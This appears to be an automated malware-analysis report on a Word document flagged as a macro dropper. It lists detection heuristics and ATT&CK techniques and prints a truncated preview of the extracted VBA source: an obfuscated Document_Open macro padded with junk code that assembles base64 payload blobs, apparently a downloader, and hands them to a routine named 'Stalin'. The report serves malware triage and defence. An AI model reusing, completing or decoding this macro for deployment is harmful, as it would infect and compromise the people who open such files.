MALICIOUS
184
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro that utilizes the Shell() function, indicating a dropper or downloader functionality. The ClamAV heuristic identifies it as 'Doc.Dropper.Agent-7345546-0'. The macro code appears to be obfuscated, but the presence of Shell() and the heuristic firings strongly suggest it is designed to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-7345546-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-7345546-0
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 20568 bytes |
SHA-256: c7be3ed862865d3a2b2a7fda2a689225b2d407e9ec53f3a44b6eb2996bd013cc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 2 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub Document_Open() If 28 < 219 Then ' kQ7yh6r1 Else ' m4Gb1SK Debug.Print "Mmh9ind" End If cTC0SU = "Y0c5M1pYSnphR1ZzYkNBa1kyOWtaU0E5SUNkS1NFSm9aRWRuWjFCVFFXbE1hVFZqWTBoV01HUklhM1ZhV0doc1NXcHpaMHBJWkdwSlJEQm5ZbTFXTTB4WE9XbGhiVlpxWkVOQ2RWcFlVWFZrTWxacFdUSjRjRnBYTlRCUGVVRnJaREpOZFZwSE9UTmliWGgyV1ZkU2JXRlhlR3hMUTBwdlpFaFNkMDlwT0haaVYyeDVXbGQ0YkdFelVubGlla1UwVEc1S01Vd3lVbXhpUjJ3eVdsaEtOVXh0VmpSYVUwbHpTVU5TZDFsWVVtOUxWSE5uWXpOU2FHTnVVWFJqU0VwMldUSldlbU41UVd0alIwWXdZVVJ6UFNjN0pHSmhjMlUyTkNBOUlGdFRlWE4wWlcwdVZHVjRkQzVGYm1OdlpHbHVaMTA2T2xWVVJqZ3VSMlYwVTNSeWFXNW" Dim XXird3Kq XXird3Kq = 178 While XXird3Kq < 978 XXird3Kq = XXird3Kq + 57 Wend y3DEg1n = "hrvy1" P08golx = jD8jEPn & XXird3Kq Dim YxhOU1 YxhOU1 = cTC0SU IMKfFVUHx = "5LRnRUZVhOMFpXMHVRMjl1ZG1WeWRGMDZPa1p5YjIxQ1lYTmxOalJUZEhKcGJtY29KR052WkdVcEtUdDBjbmw3YVdWNEtDUmlZWE5sTmpRcE8zMWpZWFJqYUh0M2NtbDBaUzFv" pAi3HpWM = "YjNOMElDUmZMbVY0WTJWd2RHbHZiaTV0WlhOellXZGxPMzA9" If 58 + 8 = 2314 / 178 Then zfXtT = "zf5tnh8MW" End If wZCQJsWkg = "IOJMQ" vXcHs1p5 = zfXtT & wZCQJsWkg If 12 < 240 Then ' LCOd3an6P Else ' UWl5iH Debug.Print "kyXdmu" End If Dim OG24CdTzU OG24CdTzU = IMKfFVUHx & pAi3HpWM Dim JvmWu JvmWu = 241 While JvmWu < 741 JvmWu = JvmWu + 45 Wend gQWOUI = 58940 fcGnS = JYWPaX & JvmWu If 16 < 228 Then ' pejLt Else ' wIUC5m MsgBox "Sn9Y0i" End If If 888 + 5 = -625 + 635 Then r1Pd2T4 = "sR0wa" End If SOIVDwsn = "cBFNR" Melv49 = r1Pd2T4 & SOIVDwsn u9OWH = YxhOU1 & OG24CdTzU If 34 < 191 Then ' HsGvpQ Else ' lGW6X Debug.Print "BDARIkM" End If Dim whFyUx whFyUx = 147 While whFyUx <= 471 whFyUx = whFyUx + 25 Wend TxQXiY = 65471 zFrovJWX = HnLrasbe & whFyUx If 64 < 182 Then ' zNLAzp Else ' dauhZIT MsgBox "M7TjIW6Zk" End If If 822 + 24 = -245 + 252 Then a2UHdn = "GgJpXFmf3" End If hFzyh = "LFSPwB0n" O17ego = a2UHdn & hFzyh Dim pLwHYRrO pLwHYRrO = 119 While pLwHYRrO < 691 pLwHYRrO = pLwHYRrO + 5 Wend yGwkAzFX = "jPFNepcjV" EdARo = qJH4uNlx0 & pLwHYRrO If 7677 / 9 = 6566 / 469 Then YU972R = "ZxjGtkv" End If M7MHKFcew = 10929 PUgpJ = YU972R & M7MHKFcew If 158 + 109 = -442 + 457 Then bzExmS57k = "zaMrF" End If r2ObepaVQ = 21683 kuhOg = bzExmS57k & r2ObepaVQ Dim Abhvds4aC Abhvds4aC = 235 While Abhvds4aC <= 607 Abhvds4aC = Abhvds4aC + 56 Wend XivJCs = 21683 B8VSs6x = LG4Fbw & Abhvds4aC Call Stalin(u9OWH) End Sub Attribute VB_Name = "UaxWD" Sub Stalin(PlTyHG) If 537 - 31 = 31959 / 3551 Then ZVZxKi = "EzxTFX" End If ilJBt6pZ = 1407 ahYFTyd = ZVZxKi & ilJBt6pZ If 27 < 201 Then ' USgjIHQ Else ' xM8pUf MsgBox "S9FK61" End If If 878 + 13 = -1316 + 1328 Then y9M0oHWVf = "cAoRQ4lc9" End If uWKgGqn = 17105 sxT9N = y9M0oHWVf & uWKgGqn If 49 < 255 Then ' ZTO4sGym Else ' FmlOwnKWI Debug.Print "Yx8cf" End If Dim H0x4FSse5 H0x4FSse5 = 57 While H0x4FSse5 < 959 H0x4FSse5 = H0x4FSse5 + 38 Wend OlBFr = 15814 ijmAPNIOH = XhWpDB & H0x4FSse5 If 14 < 243 Then ' vCn43 Else ' gqWdu Debug.Print "eZfb0" End If If 47 < 144 Then ' quqUlikP1 Else ' l18V39gL Debug.Print "ZiuqD7T" End If Dim I4f8s I4f8s = 45 While I4f8s < 421 I4f8s = I4f8s + 40 Wend jBwY8 = 48901 hsECp = lcoEMQOH & I4f8s Dim USVIeCRL USVIeCRL = 18 While USVIeCRL < 670 USVIeCRL = USVIeCRL + 10 Wend x0or1RIx = "oG4X1DM8a" MHT3sDnZ = mROBP & USVIeCRL Dim Sun98Oy Sun98Oy = 18 While Sun98Oy < 670 Sun98Oy = Sun98Oy + 10 Wend ruPpBl = "TOWng" QsSExv9L = t6Szkx52 & Sun98Oy If 23 < 186 Then ' Tw9GX Else ' OBMm3H MsgBox "fDifUCbkH" End If If 23 < 186 Then ' fciMKpe Else ' RoV8paC4 MsgBox "YKTzcX" End If Dim n4Je0npsk n4Je0npsk = 47 While n4Je0npsk < 262 n4Je0npsk = n4Je0npsk + 35 Wend DKH7klQdN = 50797 z0H2tLPaS = oDVaRoIE3 & n4Je0npsk If 201 - 64 = 730 - 719 Then YBQfiLIrW = "zRq6mY" End If bZKcz8 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.